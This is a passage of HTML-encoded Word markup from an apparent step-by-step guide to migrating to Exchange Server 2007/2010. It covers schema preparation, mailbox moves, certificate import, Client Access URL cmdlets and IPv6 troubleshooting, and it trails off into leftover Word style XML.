style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Prepare AD and Domain Schema For Installing Exchange Server 2007 / 2010.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Run this command by pointing CMD to Exchange Server CD&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;1 /&lt;span style=""&gt; &lt;/span&gt;&lt;b&gt;&lt;i&gt;Setup.com /PrepareLegacyExchangePermissions&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:&amp;quot;;" &gt;2/&lt;span style=""&gt;  &lt;/span&gt;Setup.com /PrepareSchema&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:&amp;quot;;" &gt;3/&lt;span style=""&gt;  &lt;/span&gt;Setup.com /PrepareAD&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:&amp;quot;;" &gt;4/&lt;span style=""&gt;  &lt;/span&gt;Setup.com /PrepareDomain&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:&amp;quot;;" &gt;5/&lt;span style=""&gt;  &lt;/span&gt;Setup.com /PrepareAllDomains&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;c/ Install Exchange server 2007 SP1 Std.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Copy All Files and Folders from Exchange Server CD to the Local Hard Drive. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;R/C on Setup.exe&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Compatibility TAB &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Select “Run this program in Compatibility mode for Windows server 2008”)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;(If you are installing Exchange Server 2010 run the Setup.exe Directly Without running compatibility Mode)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;R/C on EXCHANGESERVER.exe &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Compatibility TAB &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Select “Run this program in Compatibility mode for any Windows Previous Version.”&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 27pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;Ø&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt;  &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Once Exchange Server is installed successfully check the Mail Box, Distribution list (Mailboxes Should be available in Legacy Mode) &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 27pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;Ø&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt;  &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Check Recipients Connector to send and Receive Email’s.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;d/ Change Mailbox size limit In Order to Start Moving Mail box from old to new server&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraph" style="margin-left: 9pt;"&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;MEMC(Microsoft Exchange Management Console) &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Organisation Configuration&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; HUB Transport &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Global Settings &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Transport Settings &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Properties and Change the Mailbox Size limit for Send and Receive.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Transfer Mailbox from old exchange server store to new exchange server store.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;MEMC(Microsoft Exchange Management Console) &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Recipient Configuration &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Mail Box &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; select the Mailbox you want to transfer to new store.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;(Please do 4 Mailbox transfer at a time this task can take up to 18 to 23hrs)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;e/ Install Commercial Certificate &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Install Old server commercial certificate (*.p12b) &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 27pt;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt;&lt;span style="text-decoration: none;"&gt; &lt;/span&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 27pt;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt;&lt;span style="text-decoration: none;"&gt; &lt;/span&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 27pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;Ø&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt;  &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style=";font-family:&amp;quot;;" &gt;On the new server&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Start &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; mmc &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Add snap in &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Select Certificates &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Select service for this computer &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Select for this computer &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; ok.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Expand Certificates &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Click on Intermediate Certificate &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; R/C Import &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Select (*.p12b) certificate &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Follow the wizard steps and finish the process.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt; text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Open IIS Management console &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; select IIS (Server Name)&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; on right pane click on “Server Certificates” &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; on the extreme right pane select Import &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Select (*.p12b) certificate &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Follow the wizard steps and finish the process.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;f/ Change Client Access URL in order to take affect Commercial Certificate &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Run the following command on Exchange server Mgt Console. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;The following commands are for the single Exchange Server 2007 scenario&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#holding the MBX, CA, HT roles&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#Check the SCP details (Autodiscover Uri):&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Get-ClientAccessServer | FL&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#Set the new URI for SCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Get-ClientAccessServer | Set-ClientAccessServer -AutoDiscoverServiceInternalUri https://mail.babybunting.com.au/Autodiscover/Autodiscover.xml&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#Check the Web Services URL:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Get-WebServicesVirtualDirectory | FL&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#Set the new URL for Web Services:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Get-WebServicesVirtualDirectory | Set-WebServicesVirtualDirectory -InternalUrl https://&lt;fqdn&gt;/EWS/Exchange.asmx -ExternalUrl https://&lt;fqdn&gt;/EWS/Exchange.asmx&lt;o:p&gt;&lt;/o:p&gt;&lt;/fqdn&gt;&lt;/fqdn&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#List Certificates in local store:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Get-ExchangeCertificate&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Check and make sure you can see your Commercial Cetificate&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#Asign an existing Certificate of Exchange Services:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Enable-ExchangeCertificate&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Check the IPWS role attached to which Certificate and for taking role to your Commercial certificate run this command on the prompt:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Enable-ExchangeCertificate{Thumb Print of your Commercial certificate}&lt;span style=""&gt;   &lt;/span&gt;Press Enter&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;When prompted please press “A” to yes to all role transfer from old to new Commercial certificate&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;b style=""&gt;&lt;i style=""&gt;&lt;u&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Note / Troubleshooting&lt;/span&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=";font-family:&amp;quot;;" &gt; &lt;span style=""&gt; &lt;/span&gt;: &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Check the client computers of the domain for Outlook, it should pointing to new server. If not, please restart the client systems, that will do the change. It is good Idea to change/Move DNS, and DHCP services to new server. Also check the Exchange server to&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;MEMC(Microsoft Exchange Management Console) &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Organisation Configuration &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Mailbox &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; on the right hand pane please select you server name &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; R/C Properties &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; System Settings and check &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Active directory servers &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Domain controller servers being used by Exchange server &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; should be your new server.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Also at the same place please check &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Global Catalogue servers being used by Exchange server &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; should be your new server.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Please note that It will only take your new server as Active directory and Global catalogue server if your server has a Global catalogue server.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;If your server is a Global Catalogue server and still having problem in this part (It is most probably It’s IPv6 problem that is not configured), Please go to command prompt and ping the server check &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#ipconfig /all&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Disable IPv6 on the server and restart the server and check it again.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;ol start="1" type="1"&gt;&lt;li class="MsoNormal" style="line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Go to Network Connections      folder (click on Start button, then right click on Network, select      Properties, then click on “Manager Network Connections”      on Tasks pane).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style="line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;You should see various LAN,      wireless, Bluetooth, high speed Internet, and other network connections      available on the Vista computer with the network adapter description.      Right click on the network connection that you want to disable the IPv6      interface and select “Properties”. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;  &lt;p class="MsoNormal" style="margin-left: 36pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Click “Continue” on User Access Control permission request prompt. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;ol start="3" type="1"&gt;&lt;li class="MsoNormal" style="line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Clear the check box next to      the &lt;b&gt;Internet Protocol version 6 (TCP/IPv6)&lt;/b&gt; component in the list      under “This connection uses the following items” box.&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style="line-height: normal;"&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 12"&gt;&lt;meta name="Originator" content="Microsoft Word 12"&gt;&lt;link rel="File-List" href="file:///C:%5CUsers%5Ctech%5CAppData%5CLocal%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;o:officedocumentsettings&gt;   &lt;o:relyonvml/&gt;   &lt;o:allowpng/&gt;  &lt;/o:OfficeDocumentSettings&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;link rel="themeData" href="file:///C:%5CUsers%5Ctech%5CAppData%5CLocal%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_themedata.thmx"&gt;&lt;link rel="colorSchemeMapping" href="file:///C:%5CUsers%5Ctech%5CAppData%5CLocal%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_colorschememapping.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:trackmoves/&gt;   &lt;w:trackformatting/&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:donotpromoteqf/&gt;   &lt;w:lidthemeother&gt;EN-AU&lt;/w:LidThemeOther&gt;   &lt;w:lidthemeasian&gt;X-NONE&lt;/w:LidThemeAsian&gt;   &lt;w:lidthemecomplexscript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;    &lt;w:splitpgbreakandparamark/&gt;    &lt;w:dontvertaligncellwithsp/&gt;    &lt;w:dontbreakconstrainedforcedtables/&gt;    &lt;w:dontvertalignintxbx/&gt;    &lt;w:word11kerningpairs/&gt;    &lt;w:cachedcolbalance/&gt;   &lt;/w:Compatibility&gt;   &lt;m:mathpr&gt;    &lt;m:mathfont val="Cambria Math"&gt;    &lt;m:brkbin val="before"&gt;    &lt;m:brkbinsub val="--"&gt;    &lt;m:smallfrac val="off"&gt;    &lt;m:dispdef/&gt;    &lt;m:lmargin val="0"&gt;    &lt;m:rmargin val="0"&gt;    &lt;m:defjc val="centerGroup"&gt;    &lt;m:wrapindent val="1440"&gt;    &lt;m:intlim val="subSup"&gt;    &lt;m:narylim val="undOvr"&gt;   &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" defunhidewhenused="true" defsemihidden="true" defqformat="false" defpriority="99" latentstylecount="267"&gt;   &lt;w:lsdexception locked="false" priority="0" semihidden="false" unhidewhenused="false" qformat="true" name="Normal"&gt;   &lt;w:lsdexception locked="false" priority="9" semihidden="false" unhidewhenused="false" qformat="true" 